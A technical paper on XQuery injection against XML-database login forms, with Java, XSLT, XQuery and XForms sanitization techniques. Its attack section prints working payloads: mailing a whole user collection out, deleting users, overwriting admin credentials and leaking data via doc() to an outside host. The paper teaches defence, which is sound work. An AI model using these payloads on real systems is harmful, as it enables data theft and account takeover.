Note

I am not a security expert and, as far as I know, the domain covered by this paper is very new. The list of attacks and countermeasures mentioned hereafter is nothing more than the list of attacks and countermeasures I can think of. This list is certainly not exhaustive and following its advice is by no means a guarantee that you'll be safe! If you see (or think of) other attacks or solutions, drop me an email so that I may improve the next versions of this document.

Many thanks to Alessandro Vernet (Orbeon) for the time he has spent discussing these issues with me and for suggesting that I rely on query string parameters, and to Adam Retter (eXist-db developer) for his thorough review of this paper!

Code Injection

Wikipedia defines code injection as:

the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by an attacker to introduce (or "inject") code into a computer program to change the course of execution. The results of a code injection attack can be disastrous. For instance, code injection is used by some computer worms to propagate.

SQL injection is arguably the most common example of code injection since it can potentially affect any web application or website accessing a SQL database including all the widespread AMP systems.

The second well known example of code injection is Cross Site Scripting (XSS) which could be called "HTML and JavaScript injection".

According to the Web Hacking Incident Database, SQL injection is the number one attack method, involved in 20% of web attacks, and Cross Site Scripting is number two with 13%, suggesting that code injection techniques are involved in roughly one out of three attacks on the web.

If it's difficult to find any mention of XQuery injection on the web, it's probably because so few websites are powered by XML databases but also because of the false assumption that XQuery is a read only language and that its expression power is limited, meaning that the consequences of XQuery injection attacks would remain limited.

This assumption must be revised now that XML databases have started implementing XQuery Update Facilities and that XQuery engines (either databases, libraries such as Saxon or middleware such as BEA Weblogic) have extensive extension function libraries which let them communicate with the external world! Furthermore, when you think about it, even the good old XSLT 1.0 document() function or its XPath 2.0/XQuery 1.0 doc() friend are potential risks.

Example of XQuery Injection

Scenario

If you develop an application that requires user interaction, you will probably need sooner or later some kind of user authentication, and if your application is powered by an XML database, you may want to store user information in this database.

Note

There are two ways to rely on a database for user authentication: you can either store user and password information in the database (like any other information) or rely on the database internal security mechanism. The authentication method used in this example just stores user and password information in the database.

In the Java world, Tomcat comes with a number of so called authentication "realms" for plain files, SQL databases or LDAP but there is no realm to use an XML database to store authentication information.

That's not really an issue since the realm interface is easy to implement. This interface has been designed so that you can store the passwords either as plain text or encrypted. Of course, it's safer (and recommended) to store encrypted passwords, but for the sake of this example, let's say you are lazy and store them as plain text. I'll spare you the details, but the real meat in your XML database realm will then be to return the password and roles for a user with a given login name.

If you are using an XML database such as eXist with its REST API, you will end up opening a URL with a Java statement such as:

new URL("http://localhost:8080/orbeon/exist/rest/db/app/users/?_query=//user[mail=%27" + username + "%27]")

Attack

Let's put on a black hat and try to attack a site powered by an XML database that gives us a login screen such as this one:

Figure 1: Login Screen

We don't know the precise statement used by the realm to retrieve information or the database structure, but we assume that the authentication injects the content of the HTML form somewhere into an XQuery as a literal string and hope the injection is done without proper sanitization.

We don't know either if the programmer has used a single or a double quote to isolate the content of the input form, but since that makes only two possibilities, we will just try both.

The trick is:

  1. to close the literal string with a single or double quote

  2. to add whatever is needed to avoid raising an XQuery parsing error

  3. to add the XQuery statement that will carry the attack

  4. to add again whatever is needed to avoid raising a parsing error

  5. to open again a literal string using the same quote

Let's take care of the syntactic sugar first.

We'll assume that the XQuery expression is following this generic pattern:

<URL>?_query=<PATH>[<SUBPATH> = ' <entry value> ']

Our entry value can follow this other pattern:

' or <ATTACK> or .='

After injection, the XQuery expression will look like:

<URL>?_query=<PATH>[<SUBPATH> = '' or <ATTACK> or .='']

The inner or expression has three alternatives. The first one will likely return false: the <SUBPATH> is meant to be the relative path to the user name, and most applications won't tolerate empty user names in their databases. The XQuery processor will thus pull the trigger and evaluate the attack statement.
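The effect of the container string can be reproduced outside the database. The following Java sketch mimics the naive concatenation used by the realm; the class name, the helper name and the true() stand-in for <ATTACK> are assumptions made for illustration, not code taken from a real application.

```java
// Illustration only: reproduces the unsafe string concatenation discussed above.
class NaiveQueryDemo {

    // Builds the XQuery the way the unprotected realm does (hypothetical helper).
    static String naiveQuery(String username) {
        return "//user[mail='" + username + "']";
    }

    public static void main(String[] args) {
        // true() stands in for <ATTACK>; any XQuery expression could take its place.
        String entry = "' or true() or .='";
        // Prints: //user[mail='' or true() or .='']
        System.out.println(naiveQuery(entry));
    }
}
```

The printed predicate shows that the entry value is no longer data: it has become part of the expression that the XQuery processor evaluates.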

The attack must be an XQuery "Expr" production. That includes FLWOR expressions, but excludes declarations that belong to the prologue. In practice, that means that we can't use declare namespace declarations and that we need to embed extension function calls in elements that declare their namespaces.

What kind of attack can we inject?

The first kind of attack we can try won't break anything but exports information from the database to the external world.

With eXist, this is possible using standard extension modules such as the HTTP client module or the mail module. These modules can be activated or deactivated in the eXist configuration file and we can't be sure that the attack will work but if one of them is activated we'll be able to export the user collection...

An attack based on the mail module looks like the following:

<foo xmlns:mail='http://exist-db.org/xquery/mail'>
{
    let $message :=
    <mail xmlns:util='http://exist-db.org/xquery/util'>
        <from>vdv@dyomedea.com</from>
        <to>vdv@dyomedea.com</to>
        <subject>eXist collection</subject>
        <message>
            <text>The collection is :
{util:serialize(/*, ())}
            </text>
        </message>
    </mail>

return mail:send-email($message, 'localhost', ()) 
}
</foo>

A similar attack could send the content of the collection on pastebin.com using the HTTP client module.

To inject the attack, we concatenate the start container string (' or ), the attack itself and the end container string ( or .='), normalize the spaces and paste the result into the login entry field.

The login screen will return a login error, but if we've been lucky we will receive a mail with the full content of the collection on which the query has been run.

If nothing happened, we might have used the wrong quote and we can try again replacing the single quotes from our container string by double quotes.

If nothing happens once again, which is the case with the naive REST URL construction used in this example, this might be because the application does not encode the query for URI. In that case, we must do it ourselves and encode the string before copying it into the entry field like the XPath 2.0 encode-for-uri() would do.
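For readers who prefer to prepare the encoded string programmatically, here is a minimal Java sketch that approximates what encode-for-uri() does. It assumes Java 10 or later (for the URLEncoder.encode overload that takes a Charset); the class and method names are hypothetical. URLEncoder targets HTML form encoding, so the three replacements below adjust the characters where it differs from encode-for-uri().

```java
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;

// Illustration only: percent-encodes a string roughly like XPath 2.0 encode-for-uri().
class UriEncodingDemo {

    static String encodeForUri(String text) {
        return URLEncoder.encode(text, StandardCharsets.UTF_8)
                .replace("+", "%20")   // URLEncoder writes spaces as '+'
                .replace("*", "%2A")   // URLEncoder leaves '*' unescaped
                .replace("%7E", "~");  // URLEncoder escapes '~', encode-for-uri() does not
    }

    public static void main(String[] args) {
        // true() stands in for the attack expression.
        // Prints: %27%20or%20true%28%29%20or%20.%3D%27
        System.out.println(encodeForUri("' or true() or .='"));
    }
}
```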

And then, bingo:

Figure 2: New message!

We have a new message with all the information we need to login:

Figure 3: The mail

The second kind of attack we can try uses the same technique to delete information from the database. A very simple and extreme one just erases everything from the collection and leaves empty document elements:

for $u in //user return update delete $u/(@*|node())

Note that, in both cases, we have not assumed anything about the database structure!

SQL injection attacks often try to generate error messages that are displayed within the resulting HTML pages by careless sites and expose information about the database structure, but that hasn't been necessary so far.

On this authentication form, generating errors would have been hopeless since Tomcat handles this safely: it only exposes a "yes/no" answer to user entries and sends error messages to the server log. On other forms this could also be an option, leading to a third kind of attack.

If we know the database structure for any reason (this could be because we've successfully leaked information in error messages, because the application's code is open sourced or because we've managed to introspect the database using functions such as xmldb:get-child-collections()), we can also update user information with forged authentication data:

    let $u := //user[role='orbeon-admin'][1]
        return (
            update value $u/mail with 'eric@example.com',
            update value $u/password with 'foobar'
        ) 

What about the doc() function?

It can be used to leak information to the external world:

'foo' = doc(concat('http://myserver.example.com/?root=', name(/*[1])))

Protection

Now that we've seen the harm that these attacks can do, what can we do to prevent them?

A first set of recommendations is to limit the consequences of these attacks:

  1. Do not store non encrypted passwords.

  2. Use a user with read only permissions to perform read only queries.

  3. Do not enable extensions modules unless you really need them.

If the authentication realm of our example had followed these basic recommendations, our attacks would have had limited consequences:

  • If the database user used to query the database had had no write access, the attacker wouldn't have been able to erase the user information.

  • If the extension modules that allow sending mail had been disabled, the attacker wouldn't have been able to send a mail.

These recommendations are always worth following. They can be compared to the advice not to leave valuables in a room: there are cases when you need to do so, and that doesn't mean that you shouldn't put a lock on the room's door!

To block the attacks themselves, we need a way to prevent the values copied into the XQuery expressions from leaking out of the string literals where they are supposed to stay.

Generic How To

The most common way to block this kind of attack is to "escape" the dangerous characters or "sanitize" user inputs before sending them to the XQuery engine.

In an XQuery string literal, the "dangerous" characters are:

  1. The & that can be used to write predefined entity references or numeric character references and needs to be replaced by &amp;

  2. The quote (either single or double) that you use to delimit the literal that needs to be replaced by &apos; or &quot;

And that's all! These two replacements are enough to block code injections through string literals.

Of course, you also need to use a function such as encode-for-uri() so that the URL remains valid and to block injections through URL encoding.

The second way to block these attacks is to keep the values that are entered through web forms out of the query itself.

When using eXist, this can be done by encoding these values and sending them as URL query parameters. These parameters can then be retrieved using the request:get-parameter() extension function.

Which of these methods should we use?

There is no general rule and it's rather a matter of taste. That being said...

  • Sanitizing is more portable: request:get-parameter is an eXist specific function that cannot be used with other databases.

  • Parameters may (arguably) be considered cleaner since they separate the inputs from the request. They can also be used to call stored queries.

Note

These techniques are effective and sufficient to protect your application as long as you don't open a new breach. A new breach is opened when your XQuery expression dynamically executes something against a query engine.

In a highly hypothetical case where the XQuery expression would execute a SQL query, this SQL Query would have to be protected against SQL injection.

A more common case in XQuery land is when you use a *:evaluate() extension function to dynamically execute an XPath or XQuery expression.

In that case (see section “Related Attacks”) the expression needs to be further sanitized!

No Filters, Please!

It is common to see developers filtering values as a protection against SQL injection, and you could do the same as a protection against XQuery injection, but in both cases this is often a bad idea!

Whenever you filter user input, you should be doing so for data quality reasons and not for security reasons, since the constraints will very likely be different.

To protect this application against XQuery injection, we could have filtered the user input to exclude single quotes and that would have been effective (assuming we use a single quote to delimit the string literal), but that would have given Tim O'Reilly a new opportunity to rant against dumb applications that do not accept his name as an input!

We've seen that it's as easy to sanitize user input as it would have been to filter it, so please, don't use filters for security!
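The difference can be made concrete with a small Java sketch. Both helpers are hypothetical and assume that single quotes delimit the XQuery string literal: the filter rejects a perfectly legitimate name, while the sanitizer accepts it and neutralizes the quote.

```java
// Illustration only: contrasts filtering with sanitizing for a single-quoted literal.
class FilterVersusSanitize {

    // A "security" filter: accepts the input only if it contains no single quote.
    static boolean filterAccepts(String text) {
        return !text.contains("'");
    }

    // Sanitizing keeps the input and escapes what is dangerous inside the literal.
    static String sanitize(String text) {
        return text.replace("&", "&amp;").replace("'", "&apos;");
    }

    public static void main(String[] args) {
        String name = "O'Reilly";
        System.out.println(filterAccepts(name)); // prints: false
        System.out.println(sanitize(name));      // prints: O&apos;Reilly
    }
}
```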

Java

Assuming that we use single quotes to delimit XQuery string literals, inputs can be sanitized in Java using this function:

    static String sanitize(String text) {
         return text.replace("&", "&amp;").replace("'", "&apos;");
    }
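If the delimiter is not fixed once and for all, a variant that takes it as an argument may be convenient. This is only a sketch under that assumption; the class name and the two-argument signature are hypothetical.

```java
// Illustration only: sanitizes a value for an XQuery string literal delimited by ' or ".
class LiteralSanitizer {

    static String sanitize(String text, char delimiter) {
        // The & must be escaped first so that the entities added below are not escaped again.
        String escaped = text.replace("&", "&amp;");
        switch (delimiter) {
            case '\'':
                return escaped.replace("'", "&apos;");
            case '"':
                return escaped.replace("\"", "&quot;");
            default:
                throw new IllegalArgumentException("Delimiter must be ' or \"");
        }
    }

    public static void main(String[] args) {
        // Prints: say &quot;hi&quot; &amp; 'bye'
        System.out.println(sanitize("say \"hi\" & 'bye'", '"'));
    }
}
```

Only the quote that matches the delimiter is escaped; the other one is harmless inside the literal and is left untouched.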

Each user input must be sanitized separately and the whole query must then be encoded using the URLEncoder.encode() method. Depending on the context, it may also be a good idea to call an additional method such as trim() to remove leading and trailing space or toLowerCase() to normalize the value to lower case. In the authentication realm, the Java snippet could be:

     String query = URLEncoder.encode("//user[mail='" + sanitize(username.trim().toLowerCase()) + "']", "UTF-8");
     reader.parse(new InputSource(
             new URL("http://localhost:8080/orbeon/exist/rest/db/app/users/?_query=" + query).openStream()));
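To check what the database receives once the input is sanitized, the query can be built and printed before it is URL encoded. The sketch below assumes the same single-quoted pattern as the snippet above; the class and helper names are hypothetical, and Locale.ROOT is added here so that lower-casing does not depend on the server locale.

```java
import java.util.Locale;

// Illustration only: the sanitized counterpart of the naive concatenation.
class SafeQueryDemo {

    // Same replacements as sanitize() above, repeated so the sketch is self-contained.
    static String sanitize(String text) {
        return text.replace("&", "&amp;").replace("'", "&apos;");
    }

    // Builds the XQuery as it looks before URL encoding (hypothetical helper).
    static String safeQuery(String username) {
        return "//user[mail='" + sanitize(username.trim().toLowerCase(Locale.ROOT)) + "']";
    }

    public static void main(String[] args) {
        // true() stands in for an injected attack expression.
        // Prints: //user[mail='&apos; or true() or .=&apos;']
        System.out.println(safeQuery("' or true() or .='"));
    }
}
```

The injected quotes now arrive as entity references inside the literal, so the whole entry is compared to the mail element as plain text.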

To use request parameters, the query and each of the parameters need to be encoded separately:

     String query = URLEncoder.encode(
            "declare namespace request='http://exist-db.org/xquery/request';//user[mail=request:get-parameter('mail', 0)]",
            "UTF-8");
     String usernameNormalized = URLEncoder.encode(username.trim().toLowerCase(), "UTF-8");
     reader.parse(new InputSource(
            new URL("http://localhost:8080/orbeon/exist/rest/db/app/users/?mail="+ usernameNormalized + "&_query=" + query).openStream()));

The query is now a fixed string that could be stored in the eXist database or encoded in a static variable.

XPath 2.0 Environments

In environments that rely on XPath 2.0 such as XSLT 2.0, XProc, XPL,... the same patterns can be used if we replace the Java methods with their XPath 2.0 equivalents. In XSLT 2.0 it is possible to define a sanitize function similar to the one we've created in Java but this isn't the case for other host languages and we'll skip this step.

To sanitize user inputs in an XPath 2.0 host language, we need to add a level of escaping because the & character is not available directly but only through the &amp; entity reference. The XQuery query combines single and double quotes that are not very easy to handle in a select attribute (even if the escaping rules of XPath 2.0 help a lot), so the query pieces can be put into variables for convenience. That being said, the user input can be sanitized using statements such as:

        <xsl:variable name="usernameSanitized"
            select="lower-case(normalize-space(replace(replace($username, '&amp;', '&amp;amp;'), '''', '&amp;apos;')))"/>
        <xsl:variable name="queryStart">//user[mail='</xsl:variable>
        <xsl:variable name="queryEnd">']</xsl:variable>
        <xsl:variable name="query" select="encode-for-uri(concat($queryStart, $usernameSanitized, $queryEnd))"/>
        <xsl:variable name="userInformation" 
             select="doc(concat('http://localhost:8080/orbeon/exist/rest/db/app/users/?_query=', $query))"/>

To use request parameters, simply write something such as:

        <xsl:variable name="usernameNormalized" select="lower-case(normalize-space($username))"/>
        <xsl:variable name="query">
            declare namespace request='http://exist-db.org/xquery/request';
            //user[mail=request:get-parameter('mail',0)]</xsl:variable>
        <xsl:variable name="userInformation"
            select="doc(concat('http://localhost:8080/orbeon/exist/rest/db/app/users/?mail=', 
                    encode-for-uri($usernameNormalized) , '&amp;_query=', encode-for-uri($query)))"/>

Here again, the choice to normalize spaces and convert to lower case depends on the context.

XSLT 2.0

In XSLT 2.0, functions can be used to implement this technique like those shown in this transformation:

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:san="http://example.com/sanitization/"
    xmlns:xs="http://www.w3.org/2001/XMLSchema" exclude-result-prefixes="xs" version="2.0">
    
    <xsl:output method="text"/>
    
    <xsl:function name="san:sanitize-apos" as="xs:string">
        <xsl:param name="text" as="xs:string"/>
        <xsl:sequence select="replace(replace($text, '&amp;', '&amp;amp;'), '''', '&amp;apos;')"/>
    </xsl:function>
    <xsl:function name="san:sanitize-quot" as="xs:string">
        <xsl:param name="text" as="xs:string"/>
        <xsl:sequence select='replace(replace($text, "&amp;", "&amp;amp;"), """", "&amp;quot;")'/>
    </xsl:function>
    
    <xsl:template match="/">
        <xsl:value-of select="san:sanitize-apos(''' or ( for $u in //user return update delete $u/(@*|node() ) ) or .=''')"/>
    </xsl:template>
    
</xsl:stylesheet>

XQuery

Similar functions can be defined in XQuery:

xquery version "1.0";

declare function local:sanitize-apos($text as xs:string) as xs:string {
        replace(replace($text, '&amp;', '&amp;amp;'), '''', '&amp;apos;')
};

declare function local:sanitize-quot($text as xs:string) as xs:string {
        replace(replace($text, "&amp;", "&amp;amp;"), """", "&amp;quot;")
};


local:sanitize-apos(''' or ( for $u in //user return update delete $u/(@*|node() ) ) or .=''')

XForms

The problem is very similar in XForms with the difference that XForms is meant to deal with user input and that the chances that you'll hit the problem are significantly bigger!

The rule of thumb here again is: never inject a user input in an XQuery without sanitizing it or moving it out of the query using request parameters.

When using an implementation such as Orbeon Forms, that supports attribute value templates in resource attributes, it may be tempting to write submissions such as:

 <xforms:submission id="doSearch" method="get"
    resource="http://localhost:8080/orbeon/exist/rest/db/app/users/?_query=//user[mail='{instance('search')}']" 
    instance="result" replace="instance"/>

Unfortunately, this would be tantamount to the unsafe Java realm that we've used as our first example!

To secure this submission, we can just adapt one of the two methods used to secure XSLT accesses. This is especially straightforward with the Orbeon implementation, which provides an xxforms:variable extension very similar to XSLT variables. You can also go with FLWOR expressions or use xforms:bind/@calculate definitions to store intermediate results and make them more readable, but it is also possible to write a mega XPath 2.0 expression such as this one:

 <xforms:submission id="doSearch" method="get"
      resource="http://localhost:8080/orbeon/exist/rest/db/app/users/?_query={encode-for-uri(concat(
            '//user[mail=''', 
             lower-case(normalize-space(replace(replace(instance('search'), '&amp;', '&amp;amp;'), '''', '&amp;apos;'))), 
             ''']'))}"
      instance="result" replace="instance"/>

The same methods can be applied using query parameters:

  <xforms:submission id="doSearch" method="get"
     resource="http://localhost:8080/orbeon/exist/rest/db/app/users/?mail={
          encode-for-uri(lower-case(instance('search')))
        }&amp;_query={
          encode-for-uri('declare namespace request=''http://exist-db.org/xquery/request'';
                          //user[mail=request:get-parameter(''mail'',0)]')}"
      instance="result" replace="instance"/>

This works, but we can make it much simpler by relying on XForms to do the encoding all by itself! The complete XForms model would then be:

        <xforms:model>
            <xforms:instance id="search">
                <search xmlns="">
                    <mail/>
                    <_query>declare namespace request='http://exist-db.org/xquery/request';
                        //user[mail=request:get-parameter('mail',0)]</_query>
                </search>
            </xforms:instance>
            <xforms:instance id="result">
                <empty xmlns=""/>
            </xforms:instance>
            <xforms:submission id="doSearch" method="get" ref="instance('search')"
                resource="http://localhost:8080/orbeon/exist/rest/db/app/users/"
                instance="result" replace="instance"/>
        </xforms:model>

Related Attacks

We have explored in depth injections targeting XQuery string literals. What about other injections on XML based applications?

XQuery Numeric Literal Injection

It may be tempting to copy numeric input fields directly into XQuery expressions. That's safe if, and only if, these fields are validated. If not, the techniques that we've seen with string literals can easily be adapted (in fact, it's even easier for your attackers since they do not need to bother with quotes!).

Passing these values within request parameters is safe, but the query will raise errors if the input doesn't belong to the expected data type. Also note that request:get-parameter() returns string values and may need casting in your XQuery query.

In both cases, it is a good idea to validate numeric input fields before sending your query (this is a case where filters can be used without the risk of making Tim O'Reilly angry)!

When using XForms, this can be done by binding these inputs to numeric datatypes. Otherwise, use whatever language you are programming with to do the test.
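In Java, such a test could be sketched as follows. The //item[quantity=...] query, the class name and the nine digit limit (which keeps the value within the range of a Java int) are assumptions made for illustration.

```java
// Illustration only: validates a numeric field before copying it into a query.
class NumericInput {

    // Accepts an optional minus sign followed by one to nine ASCII digits.
    static boolean isValidInteger(String input) {
        return input != null && input.matches("-?[0-9]{1,9}");
    }

    // Copies the value into a hypothetical query only once it has been validated.
    static String quantityQuery(String input) {
        if (!isValidInteger(input)) {
            throw new IllegalArgumentException("Not an integer: " + input);
        }
        return "//item[quantity=" + input + "]";
    }

    public static void main(String[] args) {
        System.out.println(quantityQuery("42"));           // prints: //item[quantity=42]
        System.out.println(isValidInteger("1 or true()")); // prints: false
    }
}
```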

If you use literals and don't want to (or can't) do that test outside the XQuery query itself, you can also copy the value into a string literal and explicitly cast it into the numeric data type you are using. The string literal then needs to be sanitized as we've already seen.
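A minimal Java sketch of this approach, assuming a hypothetical //item[quantity=...] query and single-quoted literals: the value stays inside a sanitized string literal and the xs:integer() constructor does the cast on the database side.

```java
// Illustration only: wraps a numeric field in a sanitized string literal that is cast in XQuery.
class CastLiteralDemo {

    // Same replacements as for any single-quoted XQuery string literal.
    static String sanitize(String text) {
        return text.replace("&", "&amp;").replace("'", "&apos;");
    }

    // The cast to xs:integer happens in the query, not in Java (hypothetical helper).
    static String quantityQuery(String input) {
        return "//item[quantity=xs:integer('" + sanitize(input) + "')]";
    }

    public static void main(String[] args) {
        // Prints: //item[quantity=xs:integer('1 or true()')]
        System.out.println(quantityQuery("1 or true()"));
    }
}
```

With an input such as the one above, the cast fails with an error in the XQuery engine instead of letting the injected expression be evaluated.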

XQuery Direct Element Injection

Literals are the location where user input is most likely copied in XQuery based applications (they cover all the cases where the database is queried according to parameters entered by our users) but there are cases where you may want to copy user input within XQuery direct element constructors.

One of the use cases for this is the XQuery Update Facility, where update primitives may contain direct element constructors in which it is tempting to include input field values.

Here again you're safe if you use request parameters but you need to sanitize your input if you're doing direct copy.

The danger here is not so much delimiters but rather enclosed expressions that let your attacker include arbitrary XQuery expressions.

The < also needs to be escaped, as it would be understood as a tag delimiter, and so does, of course, the &.

That makes 4 characters to escape:

  1. & must be replaced by &amp;

  2. < must be replaced by &lt;

  3. { must be replaced by {{

  4. } must be replaced by }}
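These four replacements can be sketched in Java as follows. The class and method names are hypothetical, and the sketch only covers text copied into element content, not into attribute values.

```java
// Illustration only: escapes a value copied into the content of an XQuery direct element constructor.
class ElementContentSanitizer {

    static String sanitize(String text) {
        return text
                .replace("&", "&amp;")  // must come first, before any entity is added
                .replace("<", "&lt;")
                .replace("{", "{{")     // doubled braces are literal braces in XQuery
                .replace("}", "}}");
    }

    public static void main(String[] args) {
        // Prints: a&lt;b &amp; {{1+1}}
        System.out.println(sanitize("a<b & {1+1}"));
    }
}
```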

XUpdate injection

XUpdate is safer than the XQuery Update Facility since it has no support for enclosed expressions. That doesn't mean that & and < don't need to be escaped, but since XUpdate documents are well-formed XML documents, the tool or API that you'll be using to create this document will take care of that if it's an XML tool.

Unfortunately XUpdate uses XPath expressions to qualify the targets where updates should be applied, and if you use a database like eXist, which supports XPath 2.0 (or XQuery 1.0) in these expressions, this opens a door for attacks that are similar to XQuery literal injections.

Again, if you use request parameters you'll be safe.

If not, the sanitization to apply is the same as that for XQuery injection except that the XML tool or API that you'll be using should take care of the XML entities.

*:evaluate() injection

Extension functions such as saxon:evaluate (or eXist's util:eval()) are also prone to attacks similar to XQuery injection if user input is not properly sanitized.

The consequences of these injections may be amplified by extension functions that provide read and write access to system resources but even vanilla XPath can be harmful with its document() function that provides read access to the file system as well as network resources that may be behind the firewall protecting the server.

These function calls need to be secured using similar techniques adapted to the context where the function is used.

Defining variables out of the function call and using these variables within the function call is an effective solution quite similar to using query parameters in a query.

Note

When such functions are called inside a query, you may have to sanitize twice! In that case, the second level of sanitization can be done in XQuery.

Eric van der Vlist

Dyomedea

Eric is an independent consultant and trainer. His domain of expertise includes Web development and XML technologies.

He is the creator and main editor of XMLfr.org, the main site dedicated to XML technologies in French, the author of the O'Reilly animal books XML Schema and RELAX NG and a member of the ISO DSDL (http://dsdl.org) working group focused on XML schema languages.

He is based in Paris and you can reach him by mail (vdv@dyomedea.com) or meet him at one of the many conferences where he presents his projects.